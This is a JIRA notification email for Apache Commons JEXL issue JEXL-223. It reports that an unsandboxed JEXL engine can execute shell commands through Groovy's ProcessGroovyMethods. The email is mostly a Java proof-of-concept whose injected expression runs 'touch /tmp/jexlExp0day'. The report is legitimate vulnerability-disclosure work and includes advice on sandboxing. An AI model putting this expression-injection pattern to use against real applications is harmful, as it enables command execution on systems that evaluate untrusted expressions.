[ 
https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bruno P. Kinoshita updated JEXL-223:
------------------------------------
    Description: 
0x01 Summary
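Apache Commons JEXL expression command-execution vulnerability through Groovy. The PoC below uses an engine created with no sandbox configured and depends on the Groovy runtime being on the classpath.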

0x02 POC
{code}
import java.io.IOException;
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

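/**
 * Reproducer attached to JEXL-223.
 *
 * <p>It builds an engine with {@code new JexlBuilder().create()}, with no sandbox
 * configured on the builder, and evaluates an expression whose script-level
 * {@code new(...)} call names a class by string and then invokes a method on the
 * resulting object. The class named here comes from the Groovy runtime, so the
 * reproducer needs Groovy on the classpath.
 *
 * <p>NOTE(review): the exposure depends on who controls the expression text. An
 * application that passes untrusted text to {@code createExpression} should build
 * its engine with a restrictive {@code JexlSandbox} via {@code JexlBuilder.sandbox(...)}
 * so that only an explicit allow-list of classes is reachable. Confirm the options
 * available in the deployed JEXL version.
 */
public class elExp {
    /**
     * Runs the reproducer and prints the value returned by the evaluation.
     *
     * @param args unused
     * @throws IOException propagated from the calls made outside the try block
     */
    public static void main(String[] args) throws IOException {
        // Engine with builder defaults; nothing restricts which classes a script may name.
        JexlEngine jexl = new JexlBuilder().create();

        // Baseline outside JEXL: the same Groovy helper called directly from Java.
        // This only shows the helper works in this environment; it is not the reported path.
        ProcessGroovyMethods n = new ProcessGroovyMethods();
        System.out.println(n.execute("id").toString());

        // The expression under test. The mail archive had wrapped this literal across
        // two lines, which is not valid Java; it is restored here as a single literal.
        // The benign form of the same construct is new("java.lang.String", "hello wolrd").
        String jexlExp =
            "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
        JexlExpression e = jexl.createExpression(jexlExp);

        // Second baseline outside JEXL; a failure here is reported and the run continues.
        try {
            new ProcessBuilder("id").start();
        } catch (IOException e1) {
            e1.printStackTrace();
        }

        // The context variable "foo" is set but the expression never reads it:
        // the reported behaviour does not depend on anything placed in the context.
        JexlContext jc = new MapContext();
        jc.set("foo", jexlExp);

        // Evaluation is the step the report is about; the result is printed as-is.
        Object o = e.evaluate(jc);
        System.out.println(o);
    }
}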
{code}


  was:
0x01 Summary
Apache Commons JEXL expression command-execution vulnerability through Groovy.

0x02 POC
import java.io.IOException;
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

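/**
 * Reproducer attached to JEXL-223 (text of the previous issue description).
 *
 * <p>It builds an engine with {@code new JexlBuilder().create()}, with no sandbox
 * configured on the builder, and evaluates an expression whose script-level
 * {@code new(...)} call names a class by string and then invokes a method on the
 * resulting object. The class named here comes from the Groovy runtime, so the
 * reproducer needs Groovy on the classpath.
 *
 * <p>NOTE(review): the exposure depends on who controls the expression text. An
 * application that passes untrusted text to {@code createExpression} should build
 * its engine with a restrictive {@code JexlSandbox} via {@code JexlBuilder.sandbox(...)}
 * so that only an explicit allow-list of classes is reachable. Confirm the options
 * available in the deployed JEXL version.
 */
public class elExp {
    /**
     * Runs the reproducer and prints the value returned by the evaluation.
     *
     * @param args unused
     * @throws IOException propagated from the calls made outside the try block
     */
    public static void main(String[] args) throws IOException {
        // Engine with builder defaults; nothing restricts which classes a script may name.
        JexlEngine jexl = new JexlBuilder().create();

        // Baseline outside JEXL: the same Groovy helper called directly from Java.
        // This only shows the helper works in this environment; it is not the reported path.
        ProcessGroovyMethods n = new ProcessGroovyMethods();
        System.out.println(n.execute("id").toString());

        // The expression under test. The mail archive had wrapped this literal across
        // two lines, which is not valid Java; it is restored here as a single literal.
        // The benign form of the same construct is new("java.lang.String", "hello wolrd").
        String jexlExp =
            "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch /tmp/jexlExp0day\")";
        JexlExpression e = jexl.createExpression(jexlExp);

        // Second baseline outside JEXL; a failure here is reported and the run continues.
        try {
            new ProcessBuilder("id").start();
        } catch (IOException e1) {
            e1.printStackTrace();
        }

        // The context variable "foo" is set but the expression never reads it:
        // the reported behaviour does not depend on anything placed in the context.
        JexlContext jc = new MapContext();
        jc.set("foo", jexlExp);

        // Evaluation is the step the report is about; the result is printed as-is.
        Object o = e.evaluate(jc);
        System.out.println(o);
    }
}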



> Apache Commons JEXL Expression Execute Command Vulnerabilitity
> --------------------------------------------------------------
>
>                 Key: JEXL-223
>                 URL: https://issues.apache.org/jira/browse/JEXL-223
>             Project: Commons JEXL
>          Issue Type: Bug
>            Reporter: cnbird
>            Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL expression command-execution vulnerability through 
> Groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> public class elExp {
>       public static void main(String args[]) throws IOException {
>               // Create or retrieve an engine
>           JexlEngine jexl = new JexlBuilder().create();
>           // Create an expression
>           //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
>           ProcessGroovyMethods n = new ProcessGroovyMethods();
>           System.out.println(n.execute("id").toString());
>           String jexlExp = 
> "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch 
> /tmp/jexlExp0day\")";
>           JexlExpression e = jexl.createExpression( jexlExp );
>           try {
>               
>                       Process process = new ProcessBuilder("id").start();
>               } catch (IOException e1) {
>                       // TODO Auto-generated catch block
>                       e1.printStackTrace();
>               }
>           // Create a context and add data
>           JexlContext jc = new MapContext();
>           jc.set("foo", jexlExp );
>           
>           // Now evaluate the expression, getting the result
>           Object o = e.evaluate(jc);  
>           System.out.println(o);
>           }
> }
> {code}


